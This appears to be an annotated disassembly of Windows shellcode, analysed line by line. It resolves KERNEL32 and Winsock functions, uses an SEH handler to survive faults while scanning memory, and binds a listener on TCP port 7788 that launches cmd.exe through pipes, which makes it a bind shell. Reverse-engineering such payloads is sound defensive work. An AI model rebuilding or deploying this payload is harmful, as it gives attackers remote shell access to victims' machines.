0000035C ; ---------------------------------------------------------------------------
0000035C
0000035C loc_35C:                                ; called once from 17Bh while edx = 37Bh
0000035C         pop     eax                     ; eax = 180h, the return address = loc_180
0000035D         push    eax
0000035E         mov     [edx-0Eh], eax          ; overwrite the imm32 at 36Dh of "mov dword ptr [eax], 12345678h" with loc_180
00000361         retn
00000362 ; ---------------------------------------------------------------------------
00000362
00000362 loc_362:                                ; SEH handler body, entered through the jmp at 374h
00000362         mov     eax, [esp+0Ch]          ; CONTEXT *ContextRecord (third handler argument)
00000366         add     eax, 0B8h               ; &CONTEXT.Eip
0000036B         mov     dword ptr [eax], 12345678h ; placeholder patched at run time to loc_180: resume the scan after a fault
00000371         xor     eax, eax                ; ExceptionContinueExecution
00000373         retn
00000374 ; ---------------------------------------------------------------------------
00000374         jmp     short loc_362           ; the registered handler address (374h = 37Bh - 7)
00000376 ; ---------------------------------------------------------------------------
00000376
00000376 loc_376:
00000376         call    loc_15D                 ; pushes 37Bh, which loc_15D uses as its data base
0000037B
0000037B loc_37B:
0000037B         call    loc_212                 ; pushes 380h, the start of the data area
0000037B ; ---------------------------------------------------------------------------
00000380 hGetProcAddress dd 77E7564Bh            ; placeholder; replaced with the resolved address at 21Fh
00000384 hLoadLibraryA   dd 77E78023h            ; placeholder; replaced at 22Ah
00000388 aLoadlibrarya   db 'LoadLibraryA',0
00000395 aKernel32       db 'KERNEL32',0
0000039E aCreatepipe     db 'CreatePipe',0      ; names below are resolved in order into 45Ch, 460h, ... (loc_236)
000003A9 aGetstartupinfo db 'GetStartupInfoA',0
000003B9 aCreateprocessa db 'CreateProcessA',0
000003C8 aClosehandle    db 'CloseHandle',0
000003D4 aPeeknamedpipe  db 'PeekNamedPipe',0
000003E2 aGlobalalloc    db 'GlobalAlloc',0
000003EE aWritefile      db 'WriteFile',0
000003F8 aReadfile       db 'ReadFile',0
00000401 aSleep          db 'Sleep',0
00000407 aExitprocess    db 'ExitProcess',0
00000413                 db 0                   ; empty name ends the KERNEL32 list (loc_236)
00000414 aWsock32        db 'WSOCK32',0
0000041C aSocket         db 'socket',0          ; winsock names, resolved into 484h .. 498h (loc_257)
00000423 aBind           db 'bind',0
00000428 aListen         db 'listen',0
0000042F aAccept         db 'accept',0
00000436 aSend           db 'send',0
0000043B aRecv           db 'recv',0
00000440 sockaddr        dw 2                   ; sin_family = AF_INET; this 02 byte also ends the WSOCK32 name list
00000440                 dw 6C1Eh               ; sin_port, bytes 1E 6C: TCP 7788 in network byte order
00000440                 dd 0                   ; sin_addr = INADDR_ANY (all interfaces)
00000440                 db 8 dup(0)            ; sin_zero; these 16 bytes are later overwritten with the pipe handles
00000450 aCmd_exe        db 'cmd.exe',0         ; lpCommandLine for CreateProcessA